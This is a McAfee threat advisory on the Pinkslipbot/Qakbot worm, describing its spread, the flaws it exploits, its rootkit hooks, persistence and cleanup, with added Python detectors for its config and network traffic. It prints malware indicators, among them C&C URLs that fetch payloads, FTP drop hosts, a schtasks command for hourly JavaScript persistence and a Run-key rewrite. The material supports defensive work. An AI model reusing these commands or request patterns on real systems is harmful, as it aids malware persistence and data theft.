McAfee Labs Threat Advisory

W32/Pinkslipbot
May 26, 2011

Summary
The W32/Pinkslipbot worm is capable of spreading over network shares, downloading files, and updating its
software. Additionally, it can receive backdoor commands from its IRC command-and-control (C&C) server.
It attempts to steal user information and upload it to FTP sites.

Aliases:

o Qakbot
o Akbot
o Qbot

Detailed information about the worm, its propagation, and mitigation is in the following sections:

o Infection and Propagation Vectors
o Prevalence Information
o Characteristics and Symptoms
o Rootkit Behavior
o Restart Mechanism
o NTFS Folder Permission Alteration
o Getting Help from the McAfee Foundstone Services team

Infection and Propagation Vectors

There are two infection and propagation vectors that Pinkslipbot primarily uses to spread itself. Below is the
description and mitigation for each one.

Exploits
Many Pinkslipbot infections have been reported to propagate by exploiting web-related vulnerabilities.
Known vulnerabilities used to propagate this threat include:

o Vulnerability in the Microsoft Data Access Components (MDAC) Function
 http://support.microsoft.com/kb/870669
 http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx
o Apple QuickTime RTSP URL Handler Stack-based Buffer Overflow
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4673
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015
o Adobe getIcon Stack-based Buffer Overflow
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927
o MsVidCtl Overflow in Microsoft Video ActiveX Control
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-0015
o Adobe Reader and Acrobat CoolType.dll Font Parsing Buffer Overflow Vulnerability
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2883

Mitigation
It is recommended that all computer systems be updated with the latest vendor patches, not limited to the
vulnerabilities mentioned above.

In addition, restricting scripting and browser plugins for document files and media players can further
mitigate the risk of malware bypassing browser security controls.

Network Shares
Pinkslipbot is known to spread over open shares such as C$ and ADMIN$. If an open network share is found,
Pinkslipbot-related files are copied to the share and executed remotely.

Mitigation
o Enforce a strict password policy on all network shares and allow write permissions to only trusted
accounts that need it.
o Though this may not apply to all Pinkslipbot variants, it is recommended to turn off Autorun
functionality (http://support.microsoft.com/kb/967715).

USB and Removable Drives

Pinkslipbot can also spread over removable drives. Once the machine is infected, it monitors for an
attached drive. If one is found, it creates a copy of itself with the same file name as a directory on the drive.

Mitigation:

o Disable the Autorun feature on Windows. You can do this remotely using Windows Group Policies.
o Restrict the use of USB drives in mission-critical and server machines.
o Implement and test Access Protection Rules using VirusScan Enterprise to prevent writing of
AUTORUN.INF files.

Prevalence Information
The following graph captures the prevalence information seen in the field for W32/Pinkslipbot infections. This
data is captured from the McAfee Virus Map. The graph shows the daily distribution of unique IP addresses
reporting infections for this threat in May 2011:

A quick view of the distribution of these infections across countries shows that the W32/Pinkslipbot threat is
predominantly seen in the US:

A Google Maps view (North America) of reported Pinkslipbot infections in May 2011 is presented below:

W32/Pinkslipbot is known to evolve continuously. McAfee has seen many unique variants of this malware in
2011. The following graph captures the week-wise distribution of unique variants seen to date in 2011:

Characteristics and Symptoms

Description
An executable is downloaded as a result of the initial infection. The EXE contains an encrypted DLL and a
configuration file, which are dropped and used for initialization and injection. The DLL is loaded into the
EXE's process memory. It sets up hooks (see the Rootkit Behavior section) in multiple processes for data
gathering and information stealing. Pinkslipbot also injects its DLL code into processes such as:
o iexplore.exe
o outlook.exe
o firefox.exe
o opera.exe
o skype.exe
o msnmsgr.exe
o yahoomessenger.exe
o chrome.exe
o msmsgs.exe

The injected code then attempts to reach out to the Internet to gather other configuration files and updates.
In older variants, configuration information was available via a password-protected ZIP archive with the static
password "Hello999W0rld777".

The EXE, DLL and other configuration files are typically stored under a randomly named subfolder within the
following folder:

o %AllUsersProfile%\Application Data\Microsoft\

The configuration file is encrypted. On decryption it contains C&C and FTP server information. The following
is an example of such a decrypted configuration file:

cc_server_port=16768
cc_server_pass=Ijadsnanunx56512
p2p_node_lst=http://bckp01.in/cgi-bin/ls1.pl
ftphost_1=216.227.214.95:cpanel@silfersystem.com:[Password]:
ftphost_2=72.29.86.119:cpanel@gemini.com.co:[Password]:
ftphost_3=66.219.30.219:cpanel@falahuddarain.com:[Password]:
ftphost_4=110.4.45.64:cpanel@karnadya.com.my:[Password]:
ftphost_5=74.220.215.107:cpanel@incitylocal.com:[Password]:
update_conf_ver=908
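As an added illustration (not part of the advisory), the following Python parses a decrypted configuration in the key=value layout shown above and extracts the FTP drop-site details needed for the firewall restriction recommended later under Mitigation; the sample text is constructed, with placeholder hosts, IPs and passwords:

```python
import re
from typing import Dict, List

# Constructed sample modelled on the decrypted configuration in the advisory.
# Hosts, IPs (RFC 5737 ranges) and passwords are placeholders, not live values.
SAMPLE_CONFIG = """\
cc_server_port=16768
cc_server_pass=Ijadsnanunx56512
p2p_node_lst=http://bckp01.example/cgi-bin/ls1.pl
ftphost_1=198.51.100.10:cpanel@shop.example:s3cret:
ftphost_2=203.0.113.7:cpanel@blog.example:[Password]:
update_conf_ver=908
"""

# ftphost_N values have the layout ip:user@host:password: (note the trailing colon)
FTPHOST_RE = re.compile(r"^(?P<ip>[^:]+):(?P<user>[^@:]+)@(?P<host>[^:]+):(?P<pw>.*?):?$")


def parse_config(text: str) -> Dict:
    """Parse a decrypted Pinkslipbot-style key=value configuration.

    ftphost_N lines are expanded into dicts so the drop-site details can be
    handed to firewall and credential-reset work; numeric keys become ints.
    """
    cfg: Dict = {"ftp_hosts": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or "=" not in line:
            continue                      # blank or malformed line
        key, value = line.split("=", 1)
        if key.startswith("ftphost_"):
            m = FTPHOST_RE.match(value)
            if m is None:
                continue                  # unexpected layout: skip, do not guess
            cfg["ftp_hosts"].append(m.groupdict())
        elif key in ("cc_server_port", "update_conf_ver"):
            cfg[key] = int(value)
        else:
            cfg[key] = value
    return cfg


def block_list(cfg: Dict) -> List[str]:
    """IPs and host names of the FTP drop sites, deduplicated and sorted, for
    the perimeter-firewall restriction recommended under Mitigation."""
    targets = set()
    for h in cfg["ftp_hosts"]:
        targets.add(h["ip"])
        targets.add(h["host"])
    return sorted(targets)


if __name__ == "__main__":
    parsed = parse_config(SAMPLE_CONFIG)
    print("C&C port:", parsed["cc_server_port"], "config version:", parsed["update_conf_ver"])
    print("block:", ", ".join(block_list(parsed)))
```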

Once installed, a user-mode rootkit hides these files from GUI-based applications. A directory listing from
cmd.exe, however, still shows the files.

Some of the filenames observed on an infected system include:

o _qbotnti.exe
o q3.dll
o _qbotinj.exe
o q2l.exe
o q1.dll
o Start Menu\Programs\Startup\startup.bat
o si.txt
o File names containing "_irc"
o nbl_*.txt
o removeme.txt
o alias_qa.zip
o *_*.kcb
o alias__qbotnti.exe
o alias_si.txt
o alias__qbot.cb
o resume.doc
o sconnect.js
o alias_seclog.txt
o updates.cb
o updates_*new.cb
o _installed
o uninstall.tmp
o qbot.cb
o _qbot.cb
o [random].job
o Mpr.dll

The malware has key-logging, password-stealing and certificate-stealing abilities, and attempts to collect
geographic, OS, IP, e-mail address, visited-URL and other system information. Such information is sent
to compromised FTP hosts as shown below.

As seen above, the malware uploads the stolen information under the file names seclog*.kcb and
ps_dump.Administrator_*.kcb, the latter containing the stolen password information.

Network connections may be made on the following network ports:

o 80
o 21
o 31666
o 16666-16669

Network connections are known to be made to the following domains:

In addition, it can also monitor traffic to URLs that contain the following:

During our investigation of multiple variants of this threat, we observed the following variations in the HTTP
POST requests and URLs sent to the C&C server.

o http://<domain-name>/cgi-bin/jl/jloader.pl?r=q/qa.bin&n=bthes7664&it=3&b=18
o http://<domain-name>/cgi-bin/jl/jloader.pl?r=q/qa.bin&n=jpwel2451&it=2&b=6
o http://<domain-name>/cgi-bin/jl/jloader.pl?u=u/updates_usoqc8673.cb
o http://<domain-name>/cgi-bin/jl/jloader.pl?u=u/updates.cb
o http://<domain-name>/cgi-bin/jl/jloader.pl?u=u/updates_usoqc8673.cb
o http://<domain-name>/cgi-bin/jl/jloader.pl?r=q/we.js?u=usoqc8673&v=piuv8
o http://<domain-name>/cgi-bin/jl/jloader.pl?r=q/qa.zip&uninstall=ppozu1276
o http://<domain-name>/cgi-bin/jl/jloader.pl?r=q/qa.bin&n=zzekr1617&it=2&b=197//u/updates.cb
o http://<domain-name>/cgi-bin/jl/jloader.pl?loadfile=q/q2_force_exec_success
o http://<domain-name>/cgi-bin/jl/jloader.pl?loadfile=q/q2_irc_nick_
o http://<domain-name>/cgi-bin/clientinfo3.pl?cookie=socks-1-1580-zevhd0018
o http://<domain-name>/cgi-bin/clientinfo3.pl?cookie=sysinfo-0-1580-zevhd0018
o http://zurnretail.com/cgi-bin/clientinfo3.pl?cookie=socks-0-1412-qpckb8049
o http://zurnretail.com/cgi-bin/clientinfo3.pl?cookie=sysinfo-1-1412-qpckb8049
o http://swallowthewhistle.com/cgi-bin/clientinfo3.pl?cookie=sysinfo-43-2716-fzrmj8460

Note: <domain-name> varies with the active C&C server.
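As an added example (not from the advisory), the following Python classifies proxy-log URLs by the jloader.pl and clientinfo3.pl request shapes listed above, so a defender can turn them into detection logic; the log lines and the cnc.example host are constructed, and the request-type labels are this example's own names:

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log lines (client, method, URL); they are not from the
# advisory. The first three copy the jloader.pl / clientinfo3.pl request
# shapes listed above; the last two are benign lookalikes that must not fire.
SAMPLE_LOG = [
    "10.0.0.5 GET http://cnc.example/cgi-bin/jl/jloader.pl?r=q/qa.bin&n=bthes7664&it=3&b=18",
    "10.0.0.5 GET http://cnc.example/cgi-bin/jl/jloader.pl?u=u/updates_usoqc8673.cb",
    "10.0.0.9 GET http://cnc.example/cgi-bin/clientinfo3.pl?cookie=sysinfo-0-1580-zevhd0018",
    "10.0.0.9 GET http://www.example.org/cgi-bin/search.pl?q=jloader",
    "10.0.0.7 GET http://shop.example/cgi-bin/clientinfo3.pl?cookie=session=abc123",
]

JLOADER = "/cgi-bin/jl/jloader.pl"
CLIENTINFO = "/cgi-bin/clientinfo3.pl"
# check-in cookies in the advisory look like socks-1-1580-zevhd0018 / sysinfo-0-1580-zevhd0018
COOKIE_RE = re.compile(r"^(socks|sysinfo)-\d+-\d+-[a-z]+\d+$")


def classify(url: str) -> Optional[str]:
    """Map a URL to a Pinkslipbot C&C request type, or None when it matches
    neither the jloader.pl nor the clientinfo3.pl shapes from the advisory."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query, keep_blank_values=True)
    if parts.path.endswith(JLOADER):
        if "uninstall" in qs:          # r=q/qa.zip&uninstall=<id>
            return "uninstall-request"
        if "loadfile" in qs:           # loadfile=q/q2_force_exec_success
            return "status-report"
        if "u" in qs:                  # u=u/updates*.cb (configuration update)
            return "config-update"
        if qs.get("r", [""])[0].startswith("q/"):   # r=q/qa.bin, r=q/we.js
            return "component-download"
        return "jloader-other"         # same script, unrecognised parameters
    if parts.path.endswith(CLIENTINFO):
        m = COOKIE_RE.match(qs.get("cookie", [""])[0])
        if m:
            return "checkin-" + m.group(1)
    return None


def scan_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client, request type) for every log line whose URL classifies."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue                   # malformed record: skip, do not guess
        kind = classify(fields[2])
        if kind:
            hits.append((fields[0], kind))
    return hits
```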

Pinkslipbot attempts to steal the following information from infected hosts:

o POP3, IMAP, NNTP, e-mail and SMTP passwords
o Keystrokes
o Digital certificates
o HTTP session information

Some newer samples were observed to carry valid (stolen) digital signatures.

Mitigation

o Where possible, configure the perimeter and/or desktop firewall to restrict connections to the
reported network ports, URLs and domain names.
o Users who are known to have been infected should change their passwords.
o Always ensure you have the latest DATs installed for the McAfee VirusScan product. The latest DAT at
the time this document was updated is DAT 6354.
o For customers with the McAfee Network Security Platform (NSP) product, we recommend enabling the
following attack signatures:
o To detect the vulnerabilities being exploited by W32/Pinkslipbot:
 0x40231a00 - HTTP: Apple QuickTime RTSP URL Buffer Overflow
 0x4021dd00 - HTTP: Microsoft Internet Explorer ADODB.Stream Object File Installation
o To detect W32/Pinkslipbot infected victims on the network:
 0x48804e00 - BOT: Quakbot (PinkSlip) Traffic Detected

Rootkit Behavior
Some variants of this malware have also been known to install a rootkit component to hide their presence,
including the running process and registry entries. In such cases, the malware is hidden from normal
process viewers and registry editors such as Task Manager and regedit.exe. The following system APIs
are hooked to accomplish this:

o ntdll.dll!NtQuerySystemInformation
o kernel32.dll!GetProcAddress
o kernel32.dll!FindFirstFileA
o kernel32.dll!FindNextFileA
o kernel32.dll!FindFirstFileW
o kernel32.dll!FindNextFileW
o user32.dll!CharToOemBuffA
o user32.dll!GetClipboardData
o advapi32.dll!RegEnumValueW
o advapi32.dll!RegEnumValueA
o ws2_32.dll!connect
o ws2_32.dll!send
o ws2_32.dll!WSASend
o ws2_32.dll!WSAConnect
o iphlpapi.dll!GetTcpTable
o iphlpapi.dll!AllocateAndGetTcpExTableFromStack
o wininet.dll!HttpSendRequestA
o wininet.dll!HttpSendRequestW
o wininet.dll!InternetReadFile
o wininet.dll!InternetReadFileA
o wininet.dll!InternetCloseHandle
o wininet.dll!InternetQueryDataAvailable
o wininet.dll!HttpOpenRequestA
o wininet.dll!HttpOpenRequestW
o dnsapi.dll!DnsQuery_A
o dnsapi.dll!DnsQuery_W

At the time of research, some executables that it avoids hooking are:

o msdev.exe
o dbgview.exe
o mirc.exe
o ollydbg.exe
o ctfmon.exe

Pinkslipbot prevents user DNS queries from resolving when connecting to sites whose names contain the
following strings:

webroot, agnitum, ahnlab, arcabit, avast, avg, avira, avp, bitdefender, bit9, castlecops, centralcommand,
clam, av, comodo, computerassociates, cpsecure,
defender, drweb, emsisoft, esafe, eset, etrust, ewido, fortinet, f-prot, f-secure, gdata, grisoft, hacksoft,
hauri, ikarus, jotti, k7computing,
Kaspersky, malware, mcafee, microsoft, networkassociates, nod32, norman, Norton, Panda, Pctools, Prevx,
quickheal, rising, rootkit, securecomputing, sophos, spamhaus,
spyware, sunbelt, Symantec, Threatexpert, Trendmicro, virus, wilderssecurity, windowsupd

Restart Mechanism

Description
Pinkslipbot executables accept the following parameters:

/i – drops a DLL and a configuration file
/s – if passed with the configuration file, runs Pinkslipbot in service mode
/t – terminate
/c – if passed with an executable name, runs that executable

As a restart mechanism, Pinkslipbot will attempt to modify an existing “Run” registry key entry to include its
own EXE and DLL. The original executable pointed to by the “Run” entry is kept in the new “Run” command
line and launched with a "/c" switch.

As an example, it will modify an existing Run key such as:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[Original] = [Path to Original]
to:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[Original] = <random>.exe <random>.dll /c [Path to Original]

In newer variants, the Run key may be modified to:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[Original] = <random>.exe /s <Pinkslipbot config file>

Pinkslipbot uses a second restart mechanism. It saves a JavaScript (JS) file in the Windows System32 folder.
The name of this file is typically sconnect.js; newer variants use randomly named JS files.

A Windows Task Scheduler job is then created which launches this JS script. This job is scheduled to run
hourly. The JS file is also crafted to connect to malicious sites to download an update to the Pinkslipbot
components. The following is the task setup:

o "%windir%\system32\schtasks.exe" /create /tn [TaskName] /tr "%windir%\system32\cscript.exe
//E:javascript [JavaScript File]" /sc HOURLY /mo 4 /ru
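As an added example (not from the advisory), the following Python checks exported Run values and scheduled-task command lines for the two Run-entry rewrites and the cscript //E:javascript task described above, which is what an incident responder would run over a registry export or a schtasks listing; the sample values, the random folder names and the .cb configuration file name are constructed placeholders:

```python
import re
from typing import Dict, List, Optional

# Constructed sample Run values and task command lines (not taken from the advisory),
# shaped like the rewrites described above; folder and .cb names are invented placeholders.
RUN_VALUES: Dict[str, str] = {
    "Adobe Reader Speed Launcher": r'"C:\Program Files\Adobe\Reader\reader_sl.exe"',
    "ctfmon": (r"C:\Documents and Settings\All Users\Application Data\Microsoft\kwdnth\kwdnth.exe "
               r"C:\Documents and Settings\All Users\Application Data\Microsoft\kwdnth\kwdnth.dll "
               r"/c C:\WINDOWS\system32\ctfmon.exe"),
    "SoundMAX": (r"C:\Documents and Settings\All Users\Application Data\Microsoft\pfhwq\pfhwq.exe "
                 r"/s C:\Documents and Settings\All Users\Application Data\Microsoft\pfhwq\pfhwq.cb"),
}
TASK_COMMANDS: List[str] = [
    r"C:\WINDOWS\system32\cscript.exe //E:javascript C:\WINDOWS\system32\sconnect.js",
    r"C:\WINDOWS\system32\defrag.exe C: -b",
]

# older variants: <random>.exe <random>.dll /c [Path to Original]
OLD_STYLE = re.compile(r'^"?(?P<exe>.+?\.exe)"?\s+(?P<dll>.+?\.dll)\s+/c\s+(?P<original>.+)$', re.I)
# newer variants: <random>.exe /s <Pinkslipbot config file>
NEW_STYLE = re.compile(r'^"?(?P<exe>.+?\.exe)"?\s+/s\s+(?P<config>.+)$', re.I)
# dropped components sit in a random subfolder of %AllUsersProfile%\Application Data\Microsoft
DROP_DIR = re.compile(r"\\Application Data\\Microsoft\\[^\\]+\\", re.I)
# second mechanism: a scheduled task running cscript.exe //E:javascript <file>.js
JS_TASK = re.compile(r"cscript(?:\.exe)?\s+//E:javascript\s+(?P<js>\S+\.js)", re.I)


def check_run_value(name: str, value: str) -> Optional[Dict[str, str]]:
    """Details of a Run value rewritten in one of the two Pinkslipbot shapes, else None."""
    for pattern, label in ((OLD_STYLE, "exe dll /c original"), (NEW_STYLE, "exe /s config")):
        m = pattern.match(value.strip())
        if m:
            hit = {"value_name": name, "pattern": label, **m.groupdict()}
            hit["in_drop_dir"] = "yes" if DROP_DIR.search(hit["exe"]) else "no"
            return hit
    return None


def check_task_command(command: str) -> Optional[str]:
    """The .js path if the task command runs cscript //E:javascript on it, else None."""
    m = JS_TASK.search(command)
    return m.group("js") if m else None


def scan(run_values: Dict[str, str], task_commands: List[str]) -> List[str]:
    """One finding line per suspicious Run value or scheduled-task command."""
    findings = []
    for name, value in run_values.items():
        hit = check_run_value(name, value)
        if hit:
            findings.append(f"Run\\{name}: {hit['pattern']} (in drop dir: {hit['in_drop_dir']})")
    for cmd in task_commands:
        js = check_task_command(cmd)
        if js:
            findings.append(f"task runs JavaScript via cscript: {js}")
    return findings
```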

Mitigation

o Create and test a VirusScan Access Protection Rule (APR) to prevent cscript.exe and wscript.exe
processes from reading and executing files from the %UserProfile% folder, where feasible.
o Create and test a VirusScan Access Protection Rule (APR) for “updates_*new.cb”, “upd_*.cb” and
“updates*_new.cb”. These are usually used as Pinkslipbot configuration files. Blocking these files can
prevent the malware from updating.

NTFS Folder Permission Alteration

Around December 2010, new variants of Pinkslipbot were observed modifying NTFS permissions for folders
where security products are installed. This modification is possible only when the infection takes place while
the user is logged in with Administrator privileges.

When successful, NTFS permissions for security-related folders are removed, such that access is denied to
administrators and system processes. Effectively, the Windows operating system will not allow security
products to run without the appropriate permissions.

For example, the following McAfee folders are targeted:

o %AllUsersProfile%\Application Data\McAfee
o %ProgramFiles%\McAfee

Due to this change, files run from these locations will be denied by the Windows operating system. In some
cases there have been reports of Pinkslipbot removing permissions from the %ProgramFiles% folder; in such
cases many common user applications would be impacted.

Mitigation
Users should not be logged in with administrative privileges for daily use, except to perform specific
administrator tasks. This helps prevent the malware from altering folder and system permissions.

Remediation
o A custom Stinger tool is provided by McAfee Labs upon request to restore modified NTFS
permissions. You must run the Stinger tool with a user account with Administrator privileges. It will
restore the original NTFS permissions to allow McAfee programs to be loaded.

o As an alternative, manual instructions to restore the folder’s permissions are as follows:

1. Open Windows Explorer as Administrator and right-click the icon for the affected folder(s).
2. Click into “Properties” to access the folder properties.
3. Under the “Security” tab, click “Advanced”, then “Owner”.
4. Choose the Administrator as Owner (or some user with Administrator privilege).
5. Click OK when prompted to apply changes.
6. Return to the Security tab under “Properties” again.
7. Click “Advanced”, and select “Inherit from parent the permissions entries that apply to child
objects”.
8. Click OK when prompted to apply changes.

o Reboot the infected machine to restart all critical services.

Getting Help from the McAfee Foundstone Services team

This document is intended to provide a summary of current intelligence and best practices to ensure the
highest level of protection from your McAfee security solution. The McAfee Foundstone Services team offers a
full range of strategic and technical consulting services that can further help you identify security
risk and build effective solutions to remediate security vulnerabilities.

You can reach them here: https://secure.mcafee.com/apps/services/services-contact.aspx

© 2011 McAfee, Inc. All rights reserved.
